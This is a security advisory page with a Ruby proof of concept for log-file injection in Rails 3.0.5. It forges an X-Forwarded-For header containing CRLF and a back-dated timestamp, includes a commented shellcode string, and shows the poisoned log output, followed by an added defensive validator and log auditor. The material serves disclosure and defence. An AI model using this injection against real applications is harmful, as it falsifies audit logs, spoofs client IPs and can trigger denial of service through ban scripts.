Rails 3.0.5 Log File Injection Proof Of Concept

2011.03.15
Credit: none
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

#Encoding: UTF-8
#
# Log-File-Injection - Ruby on Rails 3.0.5
# possibilities:
#  - possible date back attacks (tried with request-log-analyzer: worked but teaser_check_warnings)
#  - ip spoofing
#  - binary log-injections
#  - DOS if ip is used with an iptables-ban-script
#
# !! works only on intranet apps !!
#
# Fix:
#  validate request.remote_ip until they fix it
# -----------------------
# jimmybandit.com
# http://webservsec.blogspot.com

require 'rubygems'
require 'mechanize'
require 'iconv'

ip = "192.168.1.21 "

# date back attacks with ipspoofing (CRLF terminates the forged log line)
payload = ip + "at Mon Jan 01 00:00:00 +1000 2009\x0D\x0A"
# some shell code just for binary-data demo
# payload = "\x31\xc0\x31\xdb\xb0\x17\xcd\x80" binarypayload is also possible

a = Mechanize.new
a.pre_connect_hooks << lambda { |p| p[:request]['X-Forwarded-For'] = payload }
page = a.get('http://192.168.1.21/people')

# results
=begin
################################
production.log:
################################
Started GET "/people" for 192.168.1.21 at Mon Jan 01 00:00:00 +1000 2009 at Sun Mar 13 17:47:47 +0100 2011
Processing by PeopleController#index as
Rendered people/index.html.erb within layouts/application (24.4ms)
Completed 200 OK in 63ms (Views: 32.9ms | ActiveRecord: 3.6ms)

################################
request-log-analyzer:
################################
web@debian:~/testapp/log$ request-log-analyzer production.log
Request-log-analyzer, by Willem van Bergen and Bart ten Brinke - version 1.10.0
Website: http://railsdoctors.com

production.log: 100% [==========] Time: 00:00:00

Request summary
-----------------------
Parsed lines: 14
Skipped lines: 0 <-------
Parsed requests: 7 <-------
Skipped requests: 0
Warnings: teaser_check_failed: 7
First request: 2009-01-01 00:00:12
Last request: 2009-01-01 00:00:12
Total time analyzed: 0 days

Request distribution per hour
-----------------------------
0:00 | 7 hits/day | ################################
1:00 | 0 hits/day |
...
=end
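The advisory's suggested fix is to validate request.remote_ip before it is logged or acted on. The Ruby below is an added example (not part of the original post and not Rails code) showing the two defensive halves of that: a strict validator for an X-Forwarded-For style value that rejects anything but bare IP literals, and a small audit routine that finds already-injected "Started ..." lines in a Rails 3.0 production.log (a second " at " timestamp, a non-IP address field, or raw control bytes). The header values and log excerpt are constructed samples; the function names safe_client_ip, injected_request_line? and audit_request_log are this example's own.

```ruby
require 'ipaddr'

# Constructed sample X-Forwarded-For values (not from the original post):
# a plain client IP, a proxy chain, the CRLF/timestamp shape the PoC above
# sends, and a binary blob.
SAMPLE_HEADERS = {
  clean:   "192.168.1.21",
  chained: "10.0.0.5, 192.168.1.21",
  crlf:    "192.168.1.21 at Mon Jan 01 00:00:00 +1000 2009\r\n",
  binary:  "\x31\xc0\x31\xdb\xb0\x17\xcd\x80".b,
}

# Only bare IPv4/IPv6 literals pass: no whitespace, no control characters,
# nothing a logger would write out as a new line.
IP_LITERAL = /\A[0-9a-fA-F.:]+\z/

# Validate a forwarded-address header before logging it or using it for
# access decisions (the "validate request.remote_ip" fix). Every comma
# separated entry must be an IP literal; otherwise the whole header is
# rejected (nil) and the caller should fall back to the socket peer address.
# Returns the first entry; which hop you trust depends on your proxy chain.
def safe_client_ip(header_value)
  return nil if header_value.nil?
  entries = header_value.split(",").map { |e| e.strip }
  return nil if entries.empty?
  entries.each do |candidate|
    return nil unless candidate =~ IP_LITERAL
    begin
      IPAddr.new(candidate)          # syntactic check (octet ranges etc.)
    rescue ArgumentError             # IPAddr::InvalidAddressError is a subclass
      return nil
    end
  end
  entries.first
end

# Constructed production.log excerpt: the injected request line shown in the
# advisory's results, followed by a normal request.
SAMPLE_LOG = <<-LOG
Started GET "/people" for 192.168.1.21 at Mon Jan 01 00:00:00 +1000 2009 at Sun Mar 13 17:47:47 +0100 2011
Processing by PeopleController#index as
Completed 200 OK in 63ms (Views: 32.9ms | ActiveRecord: 3.6ms)
Started GET "/people" for 192.168.1.22 at Sun Mar 13 17:48:01 +0100 2011
LOG

REQUEST_LINE  = /\AStarted \S+ "[^"]*" for /
CONTROL_CHARS = /[\x00-\x08\x0b-\x1f\x7f]/

# True when a Rails 3.0 "Started ..." line carries an injected remote address:
# the address field is not an IP literal, a second " at " timestamp follows
# the genuine one, or control bytes reached the log.
def injected_request_line?(line)
  line = line.b.chomp                # byte-wise so binary payloads cannot raise
  return false unless line =~ REQUEST_LINE
  rest = line.sub(REQUEST_LINE, "")
  address, _sep, timestamp = rest.partition(" at ")
  return true unless address =~ IP_LITERAL
  return true if timestamp.include?(" at ")
  !!(line =~ CONTROL_CHARS)
end

# Returns the injected request lines found in a log text, for alerting/review.
def audit_request_log(log_text)
  log_text.each_line.select { |l| injected_request_line?(l) }.map { |l| l.chomp }
end

if __FILE__ == $0
  SAMPLE_HEADERS.each { |name, value| puts "#{name}: #{safe_client_ip(value).inspect}" }
  puts "injected lines: #{audit_request_log(SAMPLE_LOG).size}"
end
```

Rejecting the whole header on any malformed entry is deliberate: a partially trusted value is what lets a forged timestamp ride in behind a valid-looking address, and the peer address from the socket is always available as the fallback.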


Copyright 2024, cxsecurity.com